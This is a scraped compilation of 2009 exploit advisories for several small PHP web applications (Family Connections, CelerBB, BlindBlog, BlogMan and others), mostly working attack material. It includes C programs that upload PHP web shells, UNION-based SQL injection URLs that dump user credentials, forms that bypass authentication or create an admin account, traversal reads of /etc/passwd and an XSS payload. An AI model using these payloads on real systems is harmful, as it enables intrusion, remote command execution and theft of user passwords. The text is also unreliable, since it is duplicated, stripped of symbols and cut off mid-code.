$doc = $_FILES['doc']['name'];
$desc = addslashes($_POST['desc']);
if
($docs-uploadDocument($_FILES['doc']['type'], $_FILES['doc']['name'],
$_FILES['doc']['tmp_name'])) {
...
function uploadDocument ($filetype, $filename, $filetmpname) {
global $LANG;
$known_photo_types = array('application/msword' = 'doc',
'text/plain' = 'txt', 'application/excel' = 'xsl', 'application/vnd.ms-excel'
= 'xsl', 'application/x-msexcel' = 'xsl',
'application/x-compressed' = 'zip',
'application/x-zip-compressed' = 'zip', 'application/zip' = 'zip',
'multipart/x-zip' = 'zip', 'application/rtf' = 'rtf',
'application/x-rtf' = 'rtf', 'text/richtext' = 'rtf',
'application/mspowerpoint' = 'ppt', 'application/powerpoint' = 'ppt',
'application/vnd.ms
Family Connections = 1.8.2 - Remote Shell Upload Exploit
/*
Family Connections = 1.8.2 - Remote Shell Upload Exploit
Author: Salvatore drosophila Fresta
Contact: drosophila...@gmail.com
Date: 3 April 2009
The following software will upload a simple php shell.
To execute remote commands, you must open the file
using a browser.
gcc rsue.c -o rsue
./rsue localhost /fcms/ user password
[*] Connecting...
[+] Connected
[*] Send login...
[+] Login Successful
[+] Uploading...
[+] Shell uploaded
[+] Connection closed
Open your browser and go to
http://localhost/fcms/gallery/documents/shell.php?cmd=[commands]
*/
#include string.h
#include stdlib.h
#include stdio.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include unistd.h
#include netdb.h
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
sock.sin_addr = *((struct in_addr *)host-h_addr);
if(connect(fd, (struct sockaddr *) sock, sizeof(sock)) 0) return -1;
return fd;
}
int socket_send(int socket, char *buffer, size_t size) {
if(socket 0) return -1;
return write(socket, buffer, size) 0 ? -1 : 0;
}
char *socket_receive(int socket, int tout) {
fd_set input;
int ret, byte;
char *buffer, *tmp;
struct timeval timeout;
FD_ZERO(input);
FD_SET(socket, input);
if(tout 0) {
timeout.tv_sec = tout;
timeout.tv_usec = 0;
}
if(socket 0) return NULL;
if(!(buffer = (char *) calloc (0, sizeof (char return NULL;
while (1) {
if(tout 0)
ret = select(socket + 1, input, NULL, NULL, timeout);
else
ret = select(socket + 1, input, NULL, NULL, NULL);
if (!ret) break;
if (ret 0) return NULL;
if(!(tmp = (char *) calloc (1024, sizeof (char return NULL;
if ((byte=read(socket, tmp, 1024)) 0) return NULL;
if(!byte) break;
if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen
(tmp return NULL;
strncat(buffer, tmp, strlen(buffer)+strlen(tmp));
}
return buffer;
}
void usage(char *bn) {
printf(\nFamily Connections = 1.8.2 - Remote Shell Upload Exploit\n
Author: Salvatore \drosophila\ Fresta\n\n
usage: %s server path username password\n
example: %s localhost /fcms/ admin 123456\n\n, bn,
bn);
}
int main(int argc, char *argv[]) {
int sd;
char code[] = --AaB03x\r\n
Content-Disposition: form-data;
name=\doc\; filename=\shell.php\\r\n
Content-Type: text/plain\r\n
\r\n
?php echo \pre\;
system($_GET['cmd']); echo \/pre\?\r\n
--AaB03x\r\n
Content-Disposition: form-data;
name=\desc\\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data;
name=\submitadd\\r\n
\r\n
Submit\r\n
--AaB03x--\r\n,
*buffer = NULL,
*rec = NULL,
*session = NULL;
if(argc 5) {
usage(argv[0]);
return -1;
}
if(!(buffer = (char
*)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]),
sizeof(char {
perror(calloc);
return -1;
}
sprintf(buffer, POST %sindex.php HTTP/1.1\r\n
Host: %s\r\n
Content-Type:
application/x-www-form-urlencoded\r\n
Content-Length:
%d\r\n\r\nuser=%spass=%ssubmit=Login,
argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3],
argv[4]);
printf(\n
Family Connections 1.8.2 Blind SQL Injection (Correct Version)
*** Salvatore drosophila Fresta ***
[+] Application: Family Connection
[+] Version: = 1.8.2
[+] Website: http://www.familycms.com
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 1 Apr 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] Blind SQL Injection
[-] File affected: inc/util_inc.php
Usually an SQL injection vulnerability located in the
authentication system allows a guest to bypass it, and
this is just what happens using the following cookie:
Cookie name: fcms_login_id
Cookie content: -1 UNION ALL SELECT
1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22
Cookie server: localhost (change it)
Cookie path: /
Cookie name: fcms_login_uname
Cookie content: admin
Cookie server: localhost (change it)
Cookie path: /
Cookie name: fcms_login_pw
Cookie content: password
Cookie server: localhost (change it)
Cookie path: /
Anyway the values contained in the previous cookies
are used also by other functions and queries and so
is not possible to surf on the vulnerable website
with such permissions because the CMS interrupts the
sessions each time a SQL error is encountered.
For this reason the possibility to write the result
of the SQL queries on the files is handy to bypass
this limitation.
The follows is the vulnerable code:
...
elseif (isset($_COOKIE['fcms_login_id'])) {
if (isLoggedIn($_COOKIE['fcms_login_id'],
$_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) {
$_SESSION['login_id'] = $_COOKIE['fcms_login_id'];
$_SESSION['login_uname'] = $_COOKIE['fcms_login_uname'];
$_SESSION['login_pw'] = $_COOKIE['fcms_login_pw'];
}
...
in util_inc.php:
function isLoggedIn ($userid, $username, $password) {
$result = mysql_query(SELECT * FROM `fcms_users` WHERE `id` =
$userid LIMIT 1) or die('h1Login Error (util.inc.php 275)/h1' .
mysql_error());
if (mysql_num_rows($result) 0) {
$r = mysql_fetch_array($result);
if ($r['username'] !== $username) { return false; } elseif
($r['password'] !== $password) { return false; } else { return true; }
} else {
return false;
}
}
*
[+] Code
- [A] Blind SQL Injection
/*
Family Connection = 1.8.2 - Remote Command Execution
Proof of Concept - Written by Salvatore drosophila Fresta
The following software will create a file (rce.php) in the
specified path using Blind SQL Injection bug. To exec remote
commands, you must open the file using a browser.
*/
#include string.h
#include stdlib.h
#include stdio.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include unistd.h
#include netdb.h
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
sock.sin_addr = *((struct in_addr *)host-h_addr);
if(connect(fd, (struct sockaddr *) sock, sizeof(sock)) 0) return -1;
return fd;
}
int socket_send(int socket, char *buffer, size_t size) {
if(socket 0) return -1;
return write(socket, buffer, size) 0 ? -1 : 0;
}
void usage(char *bn) {
printf(\n\nFamily Connection = 1.8.2 - Remote Command Execution\n
Proof of Concept - Written by Salvatore \drosophila\
Fresta\n\n
usage: %s server path fs path\n
example: %s localhost /fcms/
/var/www/htdocs/fcms/\n\n, bn, bn);
}
int main(int argc, char *argv[]) {
int sd;
char code[] = '?php echo \pre\%3b system($_GET[cmd])%3b echo
\/prebrbr\%3b?',
*buffer;
if(argc 4) {
usage(argv[0]);
return -1;
}
if(!(buffer = (char
*)calloc(216+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]),
sizeof(char {
perror(calloc);
return -1;
}
sprintf(buffer, GET %shome.php HTTP/1.1\r\n
Host: %s\r\n
Cookie: fcms_login_id=-1 UNION ALL
SELECT
%s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE
'%srce.php'#\r\n\r\n,
argv[2], argv[1], code, argv[3
Family Connections 1.8.1 Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User html head titleFamily Connection 1.8.1 Create Admin User Exploit/title /head body pThis exploit creates an user with administrator privileges using follows information:br Username: rootbr Password: toorbr form action=http://localhost/fcms/register.php; method=POST input type=hidden name=username value=blabla input type=hidden name=password value=blabla input type=hidden name=email value=bla...@blabla.blabla input type=hidden name=fname value=blabla input type=hidden name=lname value=blabla input type=hidden name=year value=00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'r...@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#' input type=submit name=submit value=Exploit /form /body /html To activate accounts: http://www.site.com/path/activate.php?uid=1 or 1=1code= [C] Blind SQL Injection POST /path/lostpw.php HTTP/1.1\r\n Host: www.site.com\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 193\r\n\r\n email=-1' UNION ALL SELECT '?php echo pre; system($_GET[cmd]); echo /prebrbr;?',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'# To execute commands: http://www.site.com/path/rce.php?cmd=ls * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User html head titleFamily Connection 1.8.1 Create Admin User Exploit/title /head body pThis exploit creates an user with administrator privileges using follows information:br Username: rootbr Password: toorbr form action=http://localhost/fcms/register.php; method=POST input type=hidden name=username value=blabla input type=hidden name=password value=blabla input type=hidden name=email value=bla...@blabla.blabla input type=hidden name=fname value=blabla
Community CMS 0.5 Multiple SQL Injection Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Community CMS [+] Version: 0.5 [+] Website: http://sourceforge.net/projects/communitycms/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Dork: intext:Powered by Community CMS [+] Date: 30 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] File affected: view.php, calendar.php This bug allows a guest to view username and password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users http://www.site.com/path/index.php?id=2view=eventa=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Community CMS [+] Version: 0.5 [+] Website: http://sourceforge.net/projects/communitycms/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Dork: intext:Powered by Community CMS [+] Date: 30 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] File affected: view.php, calendar.php This bug allows a guest to view username and password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users http://www.site.com/path/index.php?id=2view=eventa=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23 * [+] Fix No fix. *
phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
*** Salvatore drosophila Fresta ***
[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/
[+] Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
[+] Exploitation: Remote
[+] Date: 07 Mar 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
[-] Requisites: none
[-] File affected: templates/1/login.php
*
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guestc=0m=forums=1forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23
http://www.site.com/path/index.php?n=guestc=0m=forums=2forum_id=0topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23
http://www.site.com/path/index.php?n=guestc=0m=searchs=idwert=-1%25;
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guestc=0m=searchs=nickwert=-1%25;
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guestc=0m=searchs=forumwert=-1%25;
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg=scriptalert('XSS');/script
*
[+] Fix
No fix.
*
--
Salvatore drosophila Fresta
CWNP444351
*** Salvatore drosophila Fresta ***
[+] Application: phpCommunity 2
[+] Version: 2.1.8
[+] Website: http://sourceforge.net/projects/phpcommunity2/
[+] Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
[+] Exploitation: Remote
[+] Date: 07 Mar 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
[-] Requisites: none
[-] File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
[-] Requisites: none
[-] File affected: templates/1/login.php
*
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guestc=0m=forums=1forum_id=-1' UNION
ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guestc=0m=forums=2forum_id=0topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guestc=0m=searchs=idwert=-1%25; UNION
ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guestc=0m=searchs=nickwert=-1%25;
UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guestc=0m=searchs=forumwert=-1%25;
UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path
nForum 1.5 Multiple SQL Injection
*** Salvatore drosophila Fresta *** [+] Application: nForum [+] Version: 1.5 [+] Website: http://sourceforge.net/projects/nforum/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 06 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: showtheme.php, userinfo.php These bugs allows a guest to view username and the password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23 http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: nForum [+] Version: 1.5 [+] Website: http://sourceforge.net/projects/nforum/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 06 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: showtheme.php, userinfo.php These bugs allows a guest to view username and the password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23 http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23 * [+] Fix No fix. *
CelerBB 0.0.2 Multiple Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: CelerBB [+] Version: 0.0.2 [+] Website: http://celerbb.sourceforge.net/ [+] Bugs: [A] Multiple SQL Injection [B] Information Disclosure [C] Authenticaion Bypass [+] Exploitation: Remote [+] Date: 05 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewforum.php, viewtopic.php This bug allows a guest to view username and password list. - [B] Information Disclosure [-] Requisites: none [-] File affected: showme.php This bug allows a guest to view reserved information of any user. - [C] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass authentication. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23 http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23 - [B] Information Disclosure http://www.site.com/path/showme.php?user=admin - [C] Authentication Bypass html head titleCelerBB 0.0.2 Authentication Bypass Exploit/title /head body form action=login.php method=POST input type=hidden name=Username value=admin'# input type=submit value=Exploit /form /body /html * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: CelerBB [+] Version: 0.0.2 [+] Website: http://celerbb.sourceforge.net/ [+] Bugs: [A] Multiple SQL Injection [B] Information Disclosure [C] Authenticaion Bypass [+] Exploitation: Remote [+] Date: 05 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewforum.php, viewtopic.php This bug allows a guest to view username and password list. - [B] Information Disclosure [-] Requisites: none [-] File affected: showme.php This bug allows a guest to view reserved information of any user. - [C] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass authentication. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23 http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23 - [B] Information Disclosure http://www.site.com/path/showme.php?user=admin - [C] Authentication Bypass html head titleCelerBB 0.0.2 Authentication Bypass Exploit/title /head body form action=login.php method=POST input type=hidden name=Username value=admin'# input type=submit value=Exploit /form /body /html * [+] Fix No fix. *
WARNING - CORRECT: BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)
*** Salvatore drosophila Fresta ***
[+] Application: BlindBlog
[+] Version: 1.3.1
[+] Website: http://sourceforge.net/projects/cbblog/
[+] Bugs: [A] SQL Injection
[B] Authentication Bypass
[C] Local File Inclusion
[+] Exploitation: Remote
[+] Date: 03 Mar 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: comment.php
All queries are vulnerable.
This bug allows a guest to view username and the
password of a registered user.
$id = (isset($_GET['id']) $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC;
$resulted = $db-query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin.login.php
$username = $_POST['username'];
$password = md5($_POST['password']);
include('./db_config.php');
$db = new db_stuff;
$db-connect();
$result = $db-query(SELECT * FROM `cblog_users` WHERE `username` =
'$username', $querys);
if (mysql_num_rows($result) 1 || mysql_num_rows($result) 1)
{
echo Incorrect username;
exit;
}
$result = mysql_fetch_assoc($result);
if ($result['password'] !== $password)
{
echo 'Incorrect Password';
exit;
}
- [C] Local File Inclusion
[-] Requisites: none
[-] File affected: admin.php
This bug allow an admin to include local files.
It is possible bypass authentication using the
previous bug.
With this bug is possible to execute remote
commands using Apache logs.
...
} else if (isset($_GET['act']) $_SESSION['is_admin'])
{
$loc = 'admin.'.$_GET['act'].'.php';
include('./'.$loc);
}
...
*
[+] Code
- [A] SQL Injection
http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23
- [B] Authentication Bypass
html
head
titleBlindBlog 1.3.1 Authentication Bypass Exploit/title
/head
body
form
action=http://www.site.com/path/admin/admin.login.php?go=1;
method=POST
input type=hidden name=username value=-1'
UNION ALL SELECT
1,'admin',MD5('expl')#
input type=hidden name=password value=expl
input type=submit value=Exploit
/form
/body
/html
- [C] Local File Inclusion
Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php
http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00
--
Salvatore drosophila Fresta
CWNP444351
BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)
*** Salvatore drosophila Fresta ***
[+] Application: BlindBlog
[+] Version: 1.3.1
[+] Website: http://sourceforge.net/projects/cbblog/
[+] Bugs: [A] SQL Injection
[B] Authentication Bypass
[C] Local File Inclusion
[+] Exploitation: Remote
[+] Date: 03 Mar 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
1) Bugs
2) Code
3) Fix
*
[+] Bugs
- [A] SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: comment.php
All queries are vulnerable.
This bug allows a guest to view username and the
password of a registered user.
$id = (isset($_GET['id']) $_GET['id'] !='') ? $_GET['id'] : getlastid();
$SQL = SELECT comment,author,contact,date FROM `cblog_comments`
WHERE `pid` = '$id' ORDER BY `cid` DESC;
$resulted = $db-query($SQL, $querys);
while ($result = mysql_fetch_assoc($resulted))
$comments[] = $result;
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin.login.php
$username = $_POST['username'];
$password = md5($_POST['password']);
include('./db_config.php');
$db = new db_stuff;
$db-connect();
$result = $db-query(SELECT * FROM `cblog_users` WHERE `username` =
'$username', $querys);
if (mysql_num_rows($result) 1 || mysql_num_rows($result) 1)
{
echo Incorrect username;
exit;
}
$result = mysql_fetch_assoc($result);
if ($result['password'] !== $password)
{
echo 'Incorrect Password';
exit;
}
- [C] Local File Inclusion
[-] Requisites: none
[-] File affected: admin.php
This bug allow an admin to include local files.
It is possible bypass authentication using the
previous bug.
With this bug is possible to execute remote
commands using Apache logs.
...
} else if (isset($_GET['act']) $_SESSION['is_admin'])
{
$loc = 'admin.'.$_GET['act'].'.php';
include('./'.$loc);
}
...
*
[+] Code
- [A] SQL Injection
http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT
NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23
- [B] Authentication Bypass
html
head
titleBlindBlog 1.3.1 Authentication Bypass Exploit/title
/head
body
form
action=http://www.site.com/path/admin/admin.login.php?go=1;
method=POST
input type=hidden name=username value=-1' UNION
ALL SELECT
1,'admin',MD5('expl')#
input type=hidden name=password value=expl
input type=submit value=Exploit
/form
/body
/html
- [C] Local File Inclusion
Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php
http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd
BlogMan 0.45 Multiple Vulnerabilities
*** Salvatore drosophila Fresta ***
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = SELECT * FROM user WHERE UserID='.$id.';
$user = mysql_fetch_array(mysql_query($query)) or
die(mysql_error());
echo p class='loginusername'a
href='edit.php?id=.$id.'.$user['UserName']./a/p\n;
*/
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
